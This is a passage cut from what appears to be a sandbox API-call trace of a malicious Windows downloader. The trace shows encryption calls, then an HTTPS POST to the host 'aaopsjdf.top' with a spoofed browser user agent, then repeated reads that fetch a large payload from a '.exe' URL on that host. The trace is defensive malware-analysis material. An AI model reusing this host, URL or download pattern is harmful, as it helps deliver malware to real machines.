(hMem=0x3efcd0) returned 0x0 [0313.226] wvnsprintfA (in: pszDest=0x235c600, cchDest=21, pszFmt="%d", arglist=0x28feb44 | out: pszDest="1515610604") returned 10 [0313.226] CryptEncrypt (in: hKey=0x3e9c50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x28fea90*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x28fea90*=0x100) returned 1 [0313.226] CryptEncrypt (in: hKey=0x3e9c50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x238dfe0*, pdwDataLen=0x28feaa4*=0x20, dwBufLen=0x100 | out: pbData=0x238dfe0*, pdwDataLen=0x28feaa4*=0x100) returned 1 [0313.227] CryptDestroyKey (hKey=0x3e9c50) returned 1 [0313.227] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/1qesyozananrivoxityof.exe", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28feba0 | out: lpUrlComponents=0x28feba0) returned 1 [0313.227] wvnsprintfA (in: pszDest=0x238ded0, cchDest=516, pszFmt="%s%s", arglist=0x28febd8 | out: pszDest="https://aaopsjdf.top/IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg") returned 57 [0313.227] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28feb98 | out: lpUrlComponents=0x28feb98) returned 1 [0313.227] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x8a360, cbSize=0x28febcc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", cbSize=0x28febcc) returned 0x0 [0313.233] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0313.235] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0313.235] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0313.235] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0313.236] InternetConnectA (hInternet=0xcc0004, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0010 [0313.236] HttpOpenRequestA (hConnect=0xcc0010, lpszVerb="POST", lpszObjectName="/IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc001c [0313.252] HttpSendRequestA (hRequest=0xcc001c, lpszHeaders="Connection: close\r\nùÐé8\x02\x01", dwHeadersLength=0x13, lpOptional=0x2351038, dwOptionalLength=0x2d8) returned 0 [0317.080] InternetQueryOptionA (in: hInternet=0xcc001c, dwOption=0x1f, lpBuffer=0x28feabc, lpdwBufferLength=0x28feac0 | out: lpBuffer=0x28feabc, lpdwBufferLength=0x28feac0) returned 1 [0317.080] InternetSetOptionA (hInternet=0xcc001c, dwOption=0x1f, lpBuffer=0x28feabc, dwBufferLength=0x4) returned 1 [0317.080] HttpSendRequestA (in: hRequest=0xcc001c, lpszHeaders="Connection: close\r\nùÐé8\x02\x01", dwHeadersLength=0x13, lpOptional=0x2351038*, dwOptionalLength=0x2d8 | out: lpOptional=0x2351038*) returned 1 [0317.695] HttpQueryInfoA (in: hRequest=0xcc001c, dwInfoLevel=0x20000013, lpBuffer=0x28feabc, lpdwBufferLength=0x28feac0, lpdwIndex=0x0 | out: lpBuffer=0x28feabc*, lpdwBufferLength=0x28feac0*=0x4, lpdwIndex=0x0) returned 1 [0317.695] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.695] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x238f950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x238f950*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.697] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.697] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x2390950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x2390950*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.698] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.698] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x2391950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x2391950*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.698] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.698] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x2392950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x2392950*, lpdwNumberOfBytesRead=0x28febd0*=0xf2b) returned 1 [0317.699] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.699] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239387b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x239387b*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.700] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.700] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239487b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x239487b*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.701] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.702] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239587b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x239587b*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.702] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.702] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239687b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x239687b*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.703] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.703] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239787b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x239787b*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.757] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.758] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239887b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x239887b*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.758] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.758] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239987b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x239987b*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.759] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.759] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239a87b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x239a87b*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.760] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.760] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239b87b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x239b87b*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.761] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.761] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239c87b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x239c87b*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.761] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.761] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239d87b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x239d87b*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.762] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.762] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239e87b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x239e87b*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.762] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.762] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x239f87b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x239f87b*, lpdwNumberOfBytesRead=0x28febd0*=0xff7) returned 1 [0317.763] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.763] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23a0872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23a0872*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.763] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.763] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23a1872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23a1872*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.763] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.764] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23a2872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23a2872*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.764] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.764] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23a3872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23a3872*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.818] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.819] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23b9a8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23b9a8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.819] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.819] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23baa8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23baa8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.819] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.819] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23bba8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23bba8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.819] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.819] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23bca8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23bca8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.821] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.822] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23bda8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23bda8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.822] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.822] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23bea8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23bea8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.822] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.822] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23bfa8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23bfa8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.822] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.822] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23c0a8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23c0a8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.827] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.827] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23c1a8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23c1a8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.827] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.827] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23c2a8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23c2a8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.827] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.827] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23c3a8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23c3a8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.827] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.827] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23c4a8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23c4a8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.829] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.829] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23c5a8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23c5a8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.829] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.830] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23c6a8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23c6a8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.830] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.830] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23c7a8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23c7a8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.830] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.830] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23c8a8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23c8a8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.885] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.887] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23c9a8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23c9a8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.891] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.891] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23caa8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23caa8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.893] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.893] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23cba8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23cba8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.895] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.896] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23cca8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23cca8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.900] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.901] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x23cda8a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x23cda8a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.902] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.916] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3919f6a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3919f6a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.916] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.916] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x391af6a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x391af6a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.917] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.921] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3947e9a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3947e9a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.921] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.924] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3975dca, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3975dca*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.925] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.925] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x391df6a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x391df6a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.925] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.925] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x391ef6a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x391ef6a*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.926] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.926] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x391ff6a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x391ff6a*, lpdwNumberOfBytesRead=0x28febd0*=0xff7) returned 1 [0317.927] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.927] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3920f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3920f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.928] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.928] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3921f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3921f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.928] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.928] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3922f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3922f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.928] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.928] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3923f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3923f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.929] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.929] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3924f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3924f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.929] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.930] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3925f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3925f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.930] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.930] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3926f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3926f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.930] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.930] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3927f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3927f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.931] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.931] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3928f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3928f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.932] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.932] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3929f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3929f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.932] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.932] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x392af61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x392af61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.932] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.933] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x392bf61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x392bf61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.933] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.933] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x392cf61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x392cf61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.933] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.933] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x392df61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x392df61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.934] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.934] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x392ef61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x392ef61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.934] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.934] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x392ff61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x392ff61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.936] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.936] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3930f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3930f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.936] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.936] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3931f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3931f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.936] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.936] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3932f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3932f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.936] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.937] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3933f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3933f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.949] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.949] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3934f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3934f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.949] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.949] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3935f61, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28febd0 | out: lpBuffer=0x3935f61*, lpdwNumberOfBytesRead=0x28febd0*=0x1000) returned 1 [0317.949] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0317.950] InternetReadFile (in: hFile=0xcc001c, lpBuffer=0x3936f61, dwNumberOfBytesToRead=0x1000, 